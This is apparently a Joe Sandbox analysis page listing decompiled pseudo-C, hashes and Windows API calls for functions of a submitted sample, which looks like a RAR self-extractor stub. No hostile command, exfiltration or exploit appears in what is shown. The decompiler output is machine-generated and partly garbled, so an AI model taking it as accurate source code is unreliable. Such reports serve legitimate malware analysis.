Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 6d849aabcf0f83e4943a7536ff4594d01bfa93341c159f152ee1d01ef13445a0
Instruction ID: 716328f5bd6c0cd41e865c46c9e10c93120a2b5dc7e0c0e52e7179cf260a58e7
Opcode Fuzzy Hash: 6d849aabcf0f83e4943a7536ff4594d01bfa93341c159f152ee1d01ef13445a0
Instruction Fuzzy Hash: FBE092361402196BDB019FA0EC45FDA776CBB18382F488021B945D2060EB61DE89DA60

Uniqueness

Uniqueness Score: -1.00%

Function 00A4AC7C Relevance: 3.0, APIs: 2, Instructions: 26
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00A4AC7C(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0xa78438; // 0x768ac100
				 *0xa63278(_t5, _t13, _t16,  *[fs:0x0], 0xa62641, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L00A4EB32(); // executed
				_t8 =  *0xa93178( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}

0x00a4ac8d
0x00a4ac94
0x00a4aca5
0x00a4acab
0x00a4acb0
0x00a4acb5
0x00a4acbf
0x00a4acc8

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00A62641,000000FF), ref: 00A4ACB0
OleUninitialize.OLE32(?,?,?,?,00A62641,000000FF), ref: 00A4ACB5

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 83c6bf3d5d86836987a1c684ae76111c19dc885a29f653ef57e5b58c46047530
Instruction ID: b02b41b640aa9f4e77c68ea822a32ebe76ee09911152f12528b9b0235a17e09f
Opcode Fuzzy Hash: 83c6bf3d5d86836987a1c684ae76111c19dc885a29f653ef57e5b58c46047530
Instruction Fuzzy Hash: 0EE06576644650EFCB01DB58DC06B45FBBCFB88B20F104366F416D37A0CB746842CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00A3A243 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A3A243(WCHAR* _a4) {
				short _v4100;
				long _t7;
				long _t12;
				long _t13;

				E00A4EC50(0x1000);
				_t7 = GetFileAttributesW(_a4); // executed
				_t13 = _t7;
				if(_t13 == 0xffffffff && E00A3BB03(_a4,  &_v4100, 0x800) != 0) {
					_t12 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t12;
				}
				return _t13;
			}

0x00a3a24b
0x00a3a254
0x00a3a25a
0x00a3a25f
0x00a3a280
0x00a3a286
0x00a3a286
0x00a3a28c

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00A3A23A,?,00A3755C,?,?,?,?), ref: 00A3A254

Part of subcall function 00A3BB03: _wcslen.LIBCMT ref: 00A3BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00A3A23A,?,00A3755C,?,?,?,?), ref: 00A3A280

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 642bcce0524b50dc4d64c3d4fc1085234fdbe2a38ac7286dfe07fec6f409b53d
Instruction ID: 984fdee1a14f53ecbd7d12950e9209b156deb5130d000a1ab7c7cb9ca26ef4bc
Opcode Fuzzy Hash: 642bcce0524b50dc4d64c3d4fc1085234fdbe2a38ac7286dfe07fec6f409b53d
Instruction Fuzzy Hash: A3E092369001245BCF10EBA4CD05BD9B76CAB183E2F044261FE84E31A0D770DE45CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4DEC2 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4DEC2(void* __eflags, intOrPtr _a4, signed char _a16) {
				short _v5124;

				E00A4EC50(0x1400);
				E00A34092( &_v5124, 0xa00, E00A3E617((_a16 & 0x000000ff) + 0x65), _a4);
				SetDlgItemTextW( *0xa78458, 0x65,  &_v5124); // executed
				return E00A4B568() & 0xffffff00 |  *0xa78454 == 0x00000000;
			}

0x00a4deca
0x00a4deec
0x00a4df03
0x00a4df19

APIs

_swprintf.LIBCMT ref: 00A4DEEC

Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5

SetDlgItemTextW.USER32(00000065,?), ref: 00A4DF03

Part of subcall function 00A4B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A4B579
Part of subcall function 00A4B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A4B58A
Part of subcall function 00A4B568: IsDialogMessageW.USER32(0001041E,?), ref: 00A4B59E
Part of subcall function 00A4B568: TranslateMessage.USER32(?), ref: 00A4B5AC
Part of subcall function 00A4B568: DispatchMessageW.USER32(?), ref: 00A4B5B6

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: fc6fcb80ea1d2876e61ef70dbbe515f05ed3f1f8491493871e585bdaf17ebeab
Instruction ID: 90f70f97287fbec5c558de1063a9b3c703f18fe2bed28b1ce51c821a1ef26178
Opcode Fuzzy Hash: fc6fcb80ea1d2876e61ef70dbbe515f05ed3f1f8491493871e585bdaf17ebeab
Instruction Fuzzy Hash: A7E092B650024826DF02EBA4DD0AF9E3B6C5B05785F044861B205DA0B2DA78EA518761

Uniqueness

Uniqueness Score: -1.00%

Function 00A4081B Relevance: 3.0, APIs: 2, Instructions: 24
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A4081B(intOrPtr _a4) {
				short _v4100;
				int _t8;
				struct HINSTANCE__* _t12;

				E00A4EC50(0x1000);
				_t8 = GetSystemDirectoryW( &_v4100, 0x800);
				_t14 = _t8;
				if(_t8 != 0) {
					E00A3BDF3(_t14,  &_v4100, _a4,  &_v4100, 0x800);
					_t12 = LoadLibraryW( &_v4100); // executed
					return _t12;
				}
				return _t8;
			}

0x00a40823
0x00a40836
0x00a4083c
0x00a4083e
0x00a4084c
0x00a40858
0x00000000
0x00a40858
0x00a40860

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A40836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3F2D8,Crypt32.dll,00000000,00A3F35C,?,?,00A3F33E,?,?,?), ref: 00A40858

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 00f265cc9f3485a628559c1d48d3dd436832d034d1733250e3ba9655a576036f
Instruction ID: 37a20e60c4e3fb19d3ef0c779aa2ff003586beb7b149908c67c5606fa2241665
Opcode Fuzzy Hash: 00f265cc9f3485a628559c1d48d3dd436832d034d1733250e3ba9655a576036f
Instruction Fuzzy Hash: FFE01A768001686ADF11ABA49D49FDA7BACEF493D2F040065B649E2005DAB4DA858BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A4A3B9 Relevance: 3.0, APIs: 2, Instructions: 23
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00A4A3B9(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xa64740;
				if(_a8 == 0) {
					L00A4EB1A(); // executed
				} else {
					L00A4EB20();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x00a4a3bc
0x00a4a3be
0x00a4a3c0
0x00a4a3c3
0x00a4a3c6
0x00a4a3ce
0x00a4a3cf
0x00a4a3d2
0x00a4a3d8
0x00a4a3e1
0x00a4a3da
0x00a4a3da
0x00a4a3da
0x00a4a3e6
0x00a4a3ec
0x00a4a3f3

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A4A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A4A3E1

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 1f2b0ad8e78753df3131bd34c30ebe1d18ed9271a8e3f3db8688fcb052e6363c
Instruction ID: 1f8dd51a8b47cfb78a3dac26a01a6e466918804f6b41b95c11345f28611a2992
Opcode Fuzzy Hash: 1f2b0ad8e78753df3131bd34c30ebe1d18ed9271a8e3f3db8688fcb052e6363c
Instruction Fuzzy Hash: 9BE0ED79501218EBCB50DF55C54569ABBF8EB55360F10C05AE88697241E374AE04DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A52B8C Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00A52B8C(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E00A53C57(__ecx, __eflags, E00A52AD0); // executed
				 *0xa6e7d0 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E00A53D08(_t7, __eflags, _t1, 0xa92060);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00A52BBF(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00a52b91
0x00a52b96
0x00a52b9b
0x00a52b9f
0x00a52baa
0x00a52bb0
0x00a52bb1
0x00a52bb3
0x00a52bbe
0x00a52bb5
0x00a52bb5
0x00000000
0x00a52bb5
0x00a52ba1
0x00a52ba1
0x00a52ba3
0x00a52ba3

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A52BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A52BB5

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 66e3d5ab4d38b2fc577a64725c7246141b74dfe15eecf995edcd9577a1f9afd6
Instruction ID: dcd84fe7da1b43e1730289daca01fdf17cf56a260c7f676eb18886d72d83ac3f
Opcode Fuzzy Hash: 66e3d5ab4d38b2fc577a64725c7246141b74dfe15eecf995edcd9577a1f9afd6
Instruction Fuzzy Hash: 2DD0A93A254200294C14ABB02A0274823A5BD93BB37E10A9AEC20C54C1EB30804CA312

Uniqueness

Uniqueness Score: -1.00%

Function 00A312F1 Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A312F1(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x00a312f8
0x00a3130d
0x00a31313

APIs

GetDlgItem.USER32(?,?), ref: 00A31306
ShowWindow.USER32(00000000), ref: 00A3130D

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 33c5beb3bf36d76f763dcb078803c6c4985321f81aa5a1bc75befd39a670e78d
Instruction ID: 053ec8b31a5703066908448942b71fc2e7a26e22cc70354ccf0f6907ccc11ad8
Opcode Fuzzy Hash: 33c5beb3bf36d76f763dcb078803c6c4985321f81aa5a1bc75befd39a670e78d
Instruction Fuzzy Hash: ABC0123725C200BECF018BF5DC09C2BBBB8ABA5316F24CA0AB2A5C0070CA39C110DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00A31A04 Relevance: 1.8, APIs: 1, Instructions: 312
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00A31A04(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				char _t101;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				void* _t119;
				signed int _t125;
				intOrPtr _t126;
				char _t127;
				char _t137;
				intOrPtr _t142;
				signed int _t143;
				void* _t146;
				signed int _t151;
				signed int _t155;
				void* _t160;
				void* _t162;
				void* _t166;
				intOrPtr* _t167;
				signed int _t181;
				void* _t182;
				signed int _t184;
				char* _t198;
				intOrPtr _t199;
				signed int _t200;
				void* _t210;
				void* _t211;
				intOrPtr _t212;
				void* _t214;
				char* _t215;
				intOrPtr _t216;
				void* _t217;
				void* _t224;
				void* _t226;

				_t210 = __edx;
				E00A4EB78(0xa6265a, _t226);
				_t167 = __ecx;
				_t212 = 7;
				 *((char*)(__ecx + 0x6cd4)) = 0;
				 *((char*)(__ecx + 0x6cdc)) = 0;
				 *0xa63278(__ecx + 0x2210, _t212, _t211, _t217, _t166);
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0xc))))() != _t212) {
					L23:
					_t101 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
					return _t101;
				}
				_t220 = 0;
				 *((intOrPtr*)(__ecx + 0x6cd8)) = 0;
				_t103 = E00A31DF8(__ecx + 0x2210, _t212);
				if(_t103 == 0) {
					E00A313BA(_t226 - 0x38, 0x200000);
					 *(_t226 - 4) = 0;
					 *0xa63278();
					_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
					 *((intOrPtr*)(_t226 - 0x18)) = _t107;
					 *0xa63278( *((intOrPtr*)(_t226 - 0x38)),  *((intOrPtr*)(_t226 - 0x34)) + 0xfffffff0);
					_t109 =  *( *_t167 + 0xc)();
					_t181 = _t109;
					_t220 = 0;
					 *(_t226 - 0x14) = _t181;
					__eflags = _t181;
					if(_t181 <= 0) {
						L21:
						__eflags =  *(_t167 + 0x6cd8);
						_t182 = _t226 - 0x38;
						if( *(_t167 + 0x6cd8) != 0) {
							_t38 = _t226 - 4; // executed
							 *_t38 =  *(_t226 - 4) | 0xffffffff;
							__eflags =  *_t38;
							E00A315FB(_t182); // executed
							L26:
							_t111 =  *(_t167 + 0x6cc8);
							_t234 = _t111 - 4;
							if(_t111 != 4) {
								__eflags = _t111 - 3;
								if(_t111 != 3) {
									L32:
									 *((intOrPtr*)(_t167 + 0x2218)) = _t212;
									 *((char*)(_t226 - 0xd)) = 0;
									_t113 = E00A33B2D(_t167, _t210, _t220);
									__eflags = _t113;
									 *((char*)(_t226 - 0xe)) = _t113 != 0;
									__eflags = _t113;
									if(_t113 == 0) {
										L38:
										_t114 =  *((intOrPtr*)(_t226 - 0xd));
										L39:
										_t184 =  *((intOrPtr*)(_t167 + 0x6cdd));
										__eflags = _t184;
										if(_t184 == 0) {
											L41:
											__eflags =  *((char*)(_t167 + 0x6cdc));
											if( *((char*)(_t167 + 0x6cdc)) != 0) {
												L43:
												__eflags = _t184;
												if(__eflags == 0) {
													E00A3138B(__eflags, 0x1b, _t167 + 0x32);
												}
												__eflags =  *((char*)(_t226 + 8));
												if( *((char*)(_t226 + 8)) == 0) {
													goto L23;
												} else {
													L46:
													__eflags =  *((char*)(_t226 - 0xe));
													 *((char*)(_t167 + 0x6cce)) =  *((intOrPtr*)(_t167 + 0x223c));
													if( *((char*)(_t226 - 0xe)) == 0) {
														L69:
														__eflags =  *((char*)(_t167 + 0x6ccd));
														if( *((char*)(_t167 + 0x6ccd)) == 0) {
															L71:
															E00A40602(_t167 + 0x6d12, _t167 + 0x32, 0x800);
															L72:
															_t101 = 1;
															goto L24;
														}
														__eflags =  *((char*)(_t167 + 0x6cd1));
														if( *((char*)(_t167 + 0x6cd1)) == 0) {
															goto L72;
														}
														goto L71;
													}
													__eflags =  *((char*)(_t167 + 0x21f8));
													if( *((char*)(_t167 + 0x21f8)) == 0) {
														L49:
														__eflags =  *((intOrPtr*)(_t167 + 0x10)) - 1;
														if( *((intOrPtr*)(_t167 + 0x10)) == 1) {
															goto L69;
														}
														 *0xa63278();
														_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
														_t224 = _t119;
														_t214 = _t210;
														 *((intOrPtr*)(_t226 - 0x18)) =  *((intOrPtr*)(_t167 + 0x6cb8));
														 *(_t226 - 0x14) =  *(_t167 + 0x6cbc);
														 *((intOrPtr*)(_t226 - 0x1c)) =  *((intOrPtr*)(_t167 + 0x6cc0));
														 *((intOrPtr*)(_t226 - 0x20)) =  *((intOrPtr*)(_t167 + 0x6cc4));
														 *((intOrPtr*)(_t226 - 0x24)) =  *((intOrPtr*)(_t167 + 0x21f4));
														while(1) {
															_t125 = E00A33B2D(_t167, _t210, _t224);
															__eflags = _t125;
															if(_t125 == 0) {
																break;
															}
															_t126 =  *((intOrPtr*)(_t167 + 0x21f4));
															__eflags = _t126 - 3;
															if(_t126 != 3) {
																__eflags = _t126 - 2;
																if(_t126 == 2) {
																	__eflags =  *((char*)(_t167 + 0x6ccd));
																	if( *((char*)(_t167 + 0x6ccd)) == 0) {
																		L66:
																		_t127 = 0;
																		__eflags = 0;
																		L67:
																		 *((char*)(_t167 + 0x6cd1)) = _t127;
																		L68:
																		 *((intOrPtr*)(_t167 + 0x6cb8)) =  *((intOrPtr*)(_t226 - 0x18));
																		 *(_t167 + 0x6cbc) =  *(_t226 - 0x14);
																		 *((intOrPtr*)(_t167 + 0x6cc0)) =  *((intOrPtr*)(_t226 - 0x1c));
																		 *((intOrPtr*)(_t167 + 0x6cc4)) =  *((intOrPtr*)(_t226 - 0x20));
																		 *((intOrPtr*)(_t167 + 0x21f4)) =  *((intOrPtr*)(_t226 - 0x24));
																		 *0xa63278(_t224, _t214, 0);
																		 *( *( *_t167 + 0x10))();
																		goto L69;
																	}
																	__eflags =  *((char*)(_t167 + 0x3330));
																	if( *((char*)(_t167 + 0x3330)) != 0) {
																		goto L66;
																	}
																	_t127 = 1;
																	goto L67;
																}
																__eflags = _t126 - 5;
																if(_t126 == 5) {
																	goto L68;
																}
																L60:
																E00A31F47(_t167);
																continue;
															}
															__eflags =  *((char*)(_t167 + 0x6ccd));
															if( *((char*)(_t167 + 0x6ccd)) == 0) {
																L56:
																_t137 = 0;
																__eflags = 0;
																L57:
																 *((char*)(_t167 + 0x6cd1)) = _t137;
																goto L60;
															}
															__eflags =  *((char*)(_t167 + 0x5680));
															if( *((char*)(_t167 + 0x5680)) != 0) {
																goto L56;
															}
															_t137 = 1;
															goto L57;
														}
														goto L68;
													}
													__eflags =  *((char*)(_t167 + 0x6cd4));
													if( *((char*)(_t167 + 0x6cd4)) != 0) {
														goto L69;
													}
													goto L49;
												}
											}
											__eflags = _t114;
											if(_t114 != 0) {
												goto L46;
											}
											goto L43;
										}
										__eflags =  *((char*)(_t226 + 8));
										if( *((char*)(_t226 + 8)) == 0) {
											goto L23;
										}
										goto L41;
									}
									__eflags = 0;
									 *((char*)(_t226 - 0xd)) = 0;
									while(1) {
										E00A31F47(_t167);
										_t142 =  *((intOrPtr*)(_t167 + 0x21f4));
										__eflags = _t142 - 1;
										if(_t142 == 1) {
											break;
										}
										__eflags =  *((char*)(_t167 + 0x21f8));
										if( *((char*)(_t167 + 0x21f8)) == 0) {
											L37:
											_t143 = E00A33B2D(_t167, _t210, _t220);
											__eflags = _t143;
											 *((char*)(_t226 - 0xe)) = _t143 != 0;
											__eflags = _t143;
											if(_t143 != 0) {
												continue;
											}
											goto L38;
										}
										__eflags = _t142 - 4;
										if(_t142 == 4) {
											break;
										}
										goto L37;
									}
									_t114 = 1;
									goto L39;
								}
								_t215 = _t167 + 0x2217;
								_t220 =  *( *_t167 + 0xc);
								 *0xa63278(_t215, 1);
								_t146 =  *( *( *_t167 + 0xc))();
								__eflags = _t146 - 1;
								if(_t146 != 1) {
									goto L23;
								}
								__eflags =  *_t215;
								if( *_t215 != 0) {
									goto L23;
								}
								_t212 = 8;
								goto L32;
							}
							E00A3138B(_t234, 0x3c, _t167 + 0x32);
							goto L23;
						}
						E00A315FB(_t182);
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						_t198 =  *((intOrPtr*)(_t226 - 0x38)) + _t220;
						__eflags =  *_t198 - 0x52;
						if( *_t198 != 0x52) {
							goto L16;
						}
						_t151 = E00A31DF8(_t198, _t109 - _t220);
						__eflags = _t151;
						if(_t151 == 0) {
							L15:
							_t109 =  *(_t226 - 0x14);
							goto L16;
						}
						_t199 =  *((intOrPtr*)(_t226 - 0x18));
						 *(_t167 + 0x6cc8) = _t151;
						__eflags = _t151 - 1;
						if(_t151 != 1) {
							L18:
							_t200 = _t199 + _t220;
							 *(_t167 + 0x6cd8) = _t200;
							_t220 =  *( *_t167 + 0x10);
							 *0xa63278(_t200, 0, 0);
							 *( *( *_t167 + 0x10))();
							_t155 =  *(_t167 + 0x6cc8);
							__eflags = _t155 - 2;
							if(_t155 == 2) {
								L20:
								_t220 =  *( *_t167 + 0xc);
								 *0xa63278(_t167 + 0x2210, _t212);
								 *( *( *_t167 + 0xc))();
								goto L21;
							}
							__eflags = _t155 - 3;
							if(_t155 != 3) {
								goto L21;
							}
							goto L20;
						}
						__eflags = _t220;
						if(_t220 <= 0) {
							goto L18;
						}
						__eflags = _t199 - 0x1c;
						if(_t199 >= 0x1c) {
							goto L18;
						}
						__eflags =  *(_t226 - 0x14) - 0x1f;
						if( *(_t226 - 0x14) <= 0x1f) {
							goto L18;
						}
						_t160 =  *((intOrPtr*)(_t226 - 0x38)) - _t199;
						__eflags =  *((char*)(_t160 + 0x1c)) - 0x52;
						if( *((char*)(_t160 + 0x1c)) != 0x52) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1d)) - 0x53;
						if( *((char*)(_t160 + 0x1d)) != 0x53) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1e)) - 0x46;
						if( *((char*)(_t160 + 0x1e)) != 0x46) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1f)) - 0x58;
						if( *((char*)(_t160 + 0x1f)) == 0x58) {
							goto L18;
						}
						goto L15;
						L16:
						_t220 = _t220 + 1;
						__eflags = _t220 - _t109;
					} while (_t220 < _t109);
					goto L21;
				}
				 *(_t167 + 0x6cc8) = _t103;
				if(_t103 == 1) {
					_t216 =  *_t167;
					_t220 =  *(_t216 + 0x14);
					 *0xa63278(0);
					_t162 =  *( *(_t216 + 0x14))();
					asm("sbb edx, 0x0");
					 *0xa63278(_t162 - 7, __edx);
					 *((intOrPtr*)(_t216 + 0x10))();
					_t212 = 7;
				}
				goto L26;
			}

0x00a31a04
0x00a31a09
0x00a31a13
0x00a31a18
0x00a31a23
0x00a31a2f
0x00a31a36
0x00a31a42
0x00a31ba0
0x00a31ba0
0x00a31ba2
0x00a31ba8
0x00a31bb0
0x00a31bb0
0x00a31a4f
0x00a31a52
0x00a31a58
0x00a31a5f
0x00a31aa8
0x00a31aaf
0x00a31ab7
0x00a31abf
0x00a31acd
0x00a31ad3
0x00a31adb
0x00a31ade
0x00a31ae0
0x00a31ae2
0x00a31ae5
0x00a31ae7
0x00a31b8f
0x00a31b8f
0x00a31b96
0x00a31b99
0x00a31bb3
0x00a31bb3
0x00a31bb3
0x00a31bb7
0x00a31bbc
0x00a31bbc
0x00a31bc2
0x00a31bc5
0x00a31bd4
0x00a31bd7
0x00a31c00
0x00a31c02
0x00a31c0a
0x00a31c0d
0x00a31c12
0x00a31c14
0x00a31c18
0x00a31c1a
0x00a31c5a
0x00a31c5a
0x00a31c5d
0x00a31c5d
0x00a31c63
